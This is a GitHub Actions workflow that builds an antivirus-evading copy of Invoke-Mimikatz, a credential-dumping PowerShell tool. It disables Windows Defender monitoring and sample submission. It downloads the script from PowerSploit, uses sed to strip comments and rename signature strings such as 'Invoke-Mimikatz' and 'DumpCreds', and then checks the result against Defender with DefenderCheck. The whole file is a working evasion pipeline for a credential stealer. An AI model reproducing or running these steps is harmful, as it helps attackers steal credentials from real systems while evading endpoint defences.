name: Invoke-Mimikatz Randomizer

on:
  workflow_dispatch

jobs:
  build:
    name: Build Invoke-Mimikatz
    runs-on: windows-latest
    steps:    

    - name: Checkout
      uses: actions/checkout@v2

    - name: Add msbuild to PATH
      uses: microsoft/setup-msbuild@v1.0.0
      with:
        vs-version: 14.0

    - name: Install dependencies
      run: |
        choco install --force --force-dependencies visualcpp-build-tools windows-sdk-8.1
        choco install --force --force-dependencies microsoft-build-tools --version=12.0.21005.20140416
        git clone https://github.com/matterpreter/DefenderCheck.git "$env:GITHUB_WORKSPACE\DefenderCheck"

    - name: Configure Windows Defender
      run: |
        Set-MpPreference -DisableRealtimeMonitoring $true
        Set-MpPreference -MAPSReporting 0
        Set-MpPreference -SubmitSamplesConsent 2

    - name: Build DefenderCheck
      run: |
        cd "$env:GITHUB_WORKSPACE\DefenderCheck\DefenderCheck"
        msbuild DefenderCheck.sln /t:Build
        ls
        ls "$env:GITHUB_WORKSPACE\DefenderCheck"
        ls "$env:GITHUB_WORKSPACE\DefenderCheck\DefenderCheck\DefenderCheck"

    - name: Get Invoke-Mimikatz
      run: |
        mkdir -p "$env:GITHUB_WORKSPACE\working"
        cd "$env:GITHUB_WORKSPACE\working"
        iwr -uri https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1 -outfile "$env:GITHUB_WORKSPACE\working\Invoke-Mimikatz.ps1"

    - name: Randomize
      run: |
        cd "$env:GITHUB_WORKSPACE\working"

        sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
        sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1

        sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1

        sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1

        sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1

        sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1

        sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1
        
    - name: Check current with Defender
      run: |
        ls "$env:GITHUB_WORKSPACE\DefenderCheck\DefenderCheck\DefenderCheck\obj\Debug\DefenderCheck.exe"
        & "$env:GITHUB_WORKSPACE\DefenderCheck\DefenderCheck\DefenderCheck\obj\Debug\DefenderCheck.exe" "$env:GITHUB_WORKSPACE\working\Invoke-Mimikatz.ps1"

    - name: List directories
      run: |
        pwd
        ls
        ls  "$env:GITHUB_WORKSPACE\DefenderCheck\DefenderCheck"
        ls  "$env:GITHUB_WORKSPACE\working"

